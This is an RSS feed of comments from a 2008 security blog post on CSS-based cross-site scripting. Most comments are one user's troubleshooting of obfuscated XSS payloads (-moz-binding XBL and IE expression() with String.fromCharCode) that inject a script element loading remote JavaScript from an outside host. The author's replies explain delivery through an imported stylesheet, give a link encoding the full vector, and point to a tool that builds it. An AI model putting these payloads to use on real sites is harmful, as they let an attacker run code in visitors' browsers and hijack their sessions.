<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Ultimate XSS CSS injection</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/</link>
	<description>A tool for designers dealing with programmers dealing with designers...</description>
	<pubDate>Fri, 25 Jul 2008 14:16:20 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
		<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Sun, 20 Jan 2008 03:02:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092</guid>
		<description>Please take a look in here: 
hxxp://noconnexion.wordpress.com/</description>
		<content:encoded><![CDATA[<p>Please take a look in here:<br />
hxxp://noconnexion.wordpress.com/</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:57:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090</guid>
		<description>Yep tested on IE and Firefox</description>
		<content:encoded><![CDATA[<p>Yep tested on IE and Firefox</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:55:35 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089</guid>
		<description>I guess I was using the converted version in my css here: 
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#38;#x *** x27&#38;#x29 : 1);
}

I didn't use all the converted code for obvious reasons. Can you please confirm that you've done this through css and it works ? If yes I'll stop asking and I'll work my ass to make this work.</description>
		<content:encoded><![CDATA[<p>I guess I was using the converted version in my css here:<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&amp;#x *** x27&amp;#x29 : 1);<br />
}</p>
<p>I didn&#8217;t use all the converted code for obvious reasons. Can you please confirm that you&#8217;ve done this through css and it works ? If yes I&#8217;ll stop asking and I&#8217;ll work my ass to make this work.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Fri, 18 Jan 2008 15:30:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088</guid>
		<description>@no.connexion

Dude you need to run "convert" in Hackvertor first before adding it to the page.</description>
		<content:encoded><![CDATA[<p>@no.connexion</p>
<p>Dude you need to run &#8220;convert&#8221; in Hackvertor first before adding it to the page.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Fri, 18 Jan 2008 14:50:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087</guid>
		<description>Thanks for response.
Here are my final thoughts. 
Added in html the following:

...
&#60;style type="text/css"&#62;
@import url(http://www.example.com/css/test.css);
&#60;/style&#62;
&#60;/head&#62;
&#60;body&#62;
&#60;b&#62; This IS a test &#60;/b&#62;
&#60;/body&#62;
...

and the in test.css:
...
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#60;@hex_ent&#62;xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(&#60;@tocharcodes&#62;http://businessinfo.co.uk/labs/xss/xss.js&#60;@/tocharcodes&#62;));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;')&#60;@/hex_ent&#62; : 1);
}
...

OR

in test.css
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#38;#x *** x27&#38;#x29 : 1);
}

AND it works fine for Firefox but IE70 does nothing. I'm using 7.0.5730.13.</description>
		<content:encoded><![CDATA[<p>Thanks for response.<br />
Here are my final thoughts.<br />
Added in html the following:</p>
<p>&#8230;<br />
&lt;style type=&#8221;text/css&#8221;&gt;<br />
@import url(http://www.example.com/css/test.css);<br />
&lt;/style&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;b&gt; This IS a test &lt;/b&gt;<br />
&lt;/body&gt;<br />
&#8230;</p>
<p>and the in test.css:<br />
&#8230;<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&lt;@hex_ent&gt;xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(&#8217;x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(&lt;@tocharcodes&gt;http://businessinfo.co.uk/labs/xss/xss.js&lt;@/tocharcodes&gt;));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;&#8217;)&lt;@/hex_ent&gt; : 1);<br />
}<br />
&#8230;</p>
<p>OR</p>
<p>in test.css<br />
b</p>
<p>{<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&amp;#x *** x27&amp;#x29 : 1);<br />
}</p>
<p>AND it works fine for Firefox but IE70 does nothing. I&#8217;m using 7.0.5730.13.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1084</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Fri, 18 Jan 2008 09:17:35 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1084</guid>
		<description>@no.connexion

Yeah it's possible to use it through a CSS file. In the file you need to define the rule as :-

body {
//code here
}

Then simply insert as a normal CSS through link or @import</description>
		<content:encoded><![CDATA[<p>@no.connexion</p>
<p>Yeah it&#8217;s possible to use it through a CSS file. In the file you need to define the rule as :-</p>
<p>body {<br />
//code here<br />
}</p>
<p>Then simply insert as a normal CSS through link or @import</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1083</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Fri, 18 Jan 2008 02:33:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1083</guid>
		<description>Thanks for answer. Is it possible to use this XSS through a css file? What I've tryed to do is to insert &#60;link href="hxxp://wwwexample.com/css/xss.css"&#62; and then &#60;div class="somename" style="" id="inject"&#62;test&#60;/div&#62; in html and the xss.css should look like &#60;&#60;&#60; .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#38;#x78&#38;#...&#38;#x31&#38;#x3B&#38;#x27&#38;#x29 : 1);
} &#62;&#62;&#62;

or maybe something like that: body {
  background-image: url('javascript:alert("XSS");')
}

None of the above worked ... maybe I doing smthing wrong way or it's just not going to work.</description>
		<content:encoded><![CDATA[<p>Thanks for answer. Is it possible to use this XSS through a css file? What I&#8217;ve tryed to do is to insert &lt;link href=&#8221;hxxp://wwwexample.com/css/xss.css&#8221;&gt; and then &lt;div class=&#8221;somename&#8221; style=&#8221;" id=&#8221;inject&#8221;&gt;test&lt;/div&gt; in html and the xss.css should look like &lt;&lt;&lt; .sometext {<br />
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&amp;#x78&amp;#&#8230;&amp;#x31&amp;#x3B&amp;#x27&amp;#x29 : 1);<br />
} &gt;&gt;&gt;</p>
<p>or maybe something like that: body {<br />
  background-image: url(&#8217;javascript:alert(&#8221;XSS&#8221;);&#8217;)<br />
}</p>
<p>None of the above worked &#8230; maybe I doing smthing wrong way or it&#8217;s just not going to work.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Gareth Heyes</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1079</link>
		<dc:creator>Gareth Heyes</dc:creator>
		<pubDate>Thu, 17 Jan 2008 00:13:54 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1079</guid>
		<description>@no.connexion

Hackvertor can also decode data you know ;)

I've decoded it for you can provide the code so you can enter you're own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D

Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor-&gt;XSS-&gt;mozbindingexpression</description>
		<content:encoded><![CDATA[<p>@no.connexion</p>
<p>Hackvertor can also decode data you know <img src='http://www.thespanner.co.uk/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>I&#8217;ve decoded it for you can provide the code so you can enter you&#8217;re own:-<br />
<a href="http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D" rel="nofollow">http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D</a></p>
<p>Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1078</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Wed, 16 Jan 2008 20:32:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1078</guid>
		<description>Sorry for the mess but don't know to edit my post &#124;  guess that’s HEX there but I just don’t find any way to reverse it. &#124;*</description>
		<content:encoded><![CDATA[<p>Sorry for the mess but don&#8217;t know to edit my post |  guess that’s HEX there but I just don’t find any way to reverse it. |*</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: no.connexion</title>
		<link>http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1077</link>
		<dc:creator>no.connexion</dc:creator>
		<pubDate>Wed, 16 Jan 2008 20:30:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1077</guid>
		<description>Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/</description>
		<content:encoded><![CDATA[<p>Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/</p>
]]></content:encoded>
	</item>
</channel>
</rss>
